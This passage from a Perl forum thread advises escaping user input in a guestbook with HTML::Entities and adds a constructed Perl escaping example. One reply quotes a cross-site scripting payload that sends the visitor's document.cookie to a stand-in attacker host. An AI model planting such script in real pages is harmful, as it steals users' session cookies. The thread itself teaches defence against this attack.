in reply to Re: Emergency! Our guestbook is getting trashed by HTML!
in thread Emergency! Our guestbook is getting trashed by HTML!

This or something similar should be in any code that re-displays user-entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvenient, this can be even worse:
<script> document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document. +cookie </script>
Take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad".

In short: never display uncooked user input in a web page unless you have a very good reason to.
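As an added illustration of the advice above (example code written for this page, not the poster's own), here is how a guestbook script can pass every user-supplied field through HTML::Entities before re-displaying it. The sample entries, the `escape_for_html` helper name and the surrounding markup are constructed for the example; `encode_entities` is the real HTML::Entities function.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

# Escape the characters that let user input break out of a text node or an
# attribute value. encode_entities' default set already covers <, >, & and ",
# plus control and non-ASCII characters; the explicit list here adds the
# single quote so the result is safe inside single-quoted attributes too.
sub escape_for_html {
    my ($text) = @_;
    return encode_entities($text, q{<>&"'});
}

# Constructed sample guestbook entries, including the hostile kind the post
# warns about: tags in the name field and an attribute-breakout attempt.
my @entries = (
    { name => 'alice', message => 'Nice site! <b>Great work</b>' },
    { name => '<script>alert(1)</script>', message => 'hello' },
    { name => 'bob', message => q{" onmouseover="alert(1)} },
);

# Render each entry; because every field is escaped, the browser shows the
# tags as literal text instead of executing them.
for my $e (@entries) {
    my $name = escape_for_html( $e->{name} );
    my $msg  = escape_for_html( $e->{message} );
    print qq{<div class="entry"><b>$name</b>: $msg</div>\n};
}
```

Escape at output time, right where the value is interpolated into HTML, rather than trying to strip "bad" tags on input: an allow-list of harmless tags is hard to get right, while entity-encoding everything that is displayed as text is simple and covers the cases the thread describes.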

Re^3: Emergency! Our guestbook is getting trashed by HTML!
by manwhore (Initiate) on Jan 07, 2005 at 22:49 UTC
    Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.